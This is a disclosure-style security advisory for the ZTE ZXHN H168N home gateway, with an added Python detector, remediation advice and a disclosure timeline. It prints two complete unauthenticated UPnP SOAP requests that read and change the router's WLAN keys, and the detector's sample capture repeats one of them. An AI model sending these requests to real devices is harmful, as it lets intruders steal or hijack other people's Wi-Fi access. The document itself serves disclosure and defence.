ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass

ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.

MD5 | 835798e5ebba5abb019adf55717b5e7d

[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for educational purposes; I would not be responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Hardware/Software:

Model name: ZXHN H168N v2.2

Build Timestamp: 20171127193202

Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to the WLAN password (GetSecurityKeys, no credentials required):

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change (SetSecurityKeys, no credentials required):

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
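As an added defensive example (not the advisory author's code), the following Python flags unauthenticated POSTs to the two WLANConfiguration actions shown above when run over raw HTTP request captures; the host address and the trimmed SOAP body in the sample capture are constructed.

```python
import re

# The two WLANConfiguration actions from the advisory that must never be reachable unauthenticated.
SENSITIVE_ACTIONS = {
    "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys": "read WLAN keys",
    "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys": "change WLAN keys",
}
UPNP_PORT = 52869  # UPnP control port shown in the advisory's requests


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw):
    """Return a finding string for an unauthenticated POST to a sensitive
    action on the UPnP control port, or None if the request is not one."""
    method, path, headers, body = parse_request(raw)
    action = headers.get("soapaction", "").strip('"')
    host = headers.get("host", "")
    port = int(host.rsplit(":", 1)[1]) if ":" in host else 80
    if method != "POST" or port != UPNP_PORT or action not in SENSITIVE_ACTIONS:
        return None
    # A credential header would at least show an authentication attempt; the advisory's requests carry none.
    if "authorization" in headers or "cookie" in headers:
        return None
    # Confirm the SOAP body really invokes the action named in the header.
    op = action.rsplit("#", 1)[1]
    if not re.search(r"<u:%s\b" % re.escape(op), body):
        return None
    return "%s %s: unauthenticated %s via %s" % (method, path, SENSITIVE_ACTIONS[action], op)


# Constructed capture modelled on the advisory's first request (placeholder host, body trimmed).
SAMPLE = (
    "POST /control/igd/wlanc_1_1 HTTP/1.1\r\n"
    "Host: 192.0.2.1:52869\r\n"
    "Content-Type: text/xml; charset=\"utf-8\"\r\n"
    "SOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\"\r\n"
    "\r\n"
    "<s:Envelope><s:Body><u:GetSecurityKeys "
    "xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"/></s:Body></s:Envelope>"
)
```

Running `classify` over each request in a capture of traffic to the gateway's UPnP port reports the two actions the advisory names; requests to other actions, other ports, or carrying credentials are ignored.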

[*] Solution:

UPnP should not expose privileged services such as reading or changing WLAN keys without authentication; where a firmware fix is not possible, UPnP should be disabled on the affected devices.

[*] Note:

There are other services which should not be published over UPnP; they are not covered in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified - 20 August, 2018

Reported to ZTE - 28 August, 2018

ZTE official statement - 17 September 2018

ZTE patched the vulnerability - 12 November 2018

The operator pushed the update - 12 November 2018

CVE published - CVE-2018-7357 and CVE-2018-7358

Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
